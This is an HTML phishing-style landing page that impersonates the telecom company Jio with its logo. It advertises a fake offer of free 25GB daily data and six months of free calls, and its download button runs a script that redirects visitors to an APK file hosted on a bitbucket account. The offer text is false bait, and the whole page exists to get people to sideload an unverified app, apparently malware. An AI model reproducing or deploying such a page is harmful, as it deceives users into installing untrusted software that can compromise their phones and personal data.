<html>
	<meta name="viewport" content="width=device-width, initial-scale=1">
<head>
<style>
body{
background-color:#0287CE;
color:#FFF;
font-family: sans-serif;
}
p,h2{
color:#FFF;
}
.myButton {
	box-shadow:inset 0px 1px 0px 0px #7a8eb9;
	background-color:#253b8c;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:22px;
	font-weight:bold;
	padding:16px 24px;
	text-decoration:none;
}
.myButton:hover {
	background-color:#314179;
}
.myButton:active {
	position:relative;
	top:1px;
}


        

</style>

<script>
function donva() 
{
    var m = new Date().getMinutes(); 
	if(m<500)
	{
		window.location="https://bitbucket.org/offernews/netvocher/downloads/Prime_Offer_v3.apk"; 
	}
	else if(m<55)
	{
		window.location="https://bitbucket.org/offernews/netvocher/downloads/Prime_Offer_v3.apk";
	}
	else
	{
		window.location="https://bitbucket.org/offernews/netvocher/downloads/Prime_Offer_v3.apk";
	}
}
</script>

</head>
<body>
<center>
<div>
	<img src="https://cdn.androidheadlines.com/wp-content/uploads/2018/04/Jio-Reliance-Logo-Blue-2018.png" width="100%" />
	<br>
	<p><h1>Jio 25GB Offer</h1>
		<h2>Jio has announced today to give<br>
		free 25GB data daily and free<Br>
		calls for 6-MONTHS to all<br> 
		Jio Prime Users.</h2>
<h3>Register this Jio Offer without any cost
using all new Prime app.</h3>
	</p>
	<a onClick="donva()" class="myButton">Download Now(.APK)</a>
</div>
</center>
</body>
</html>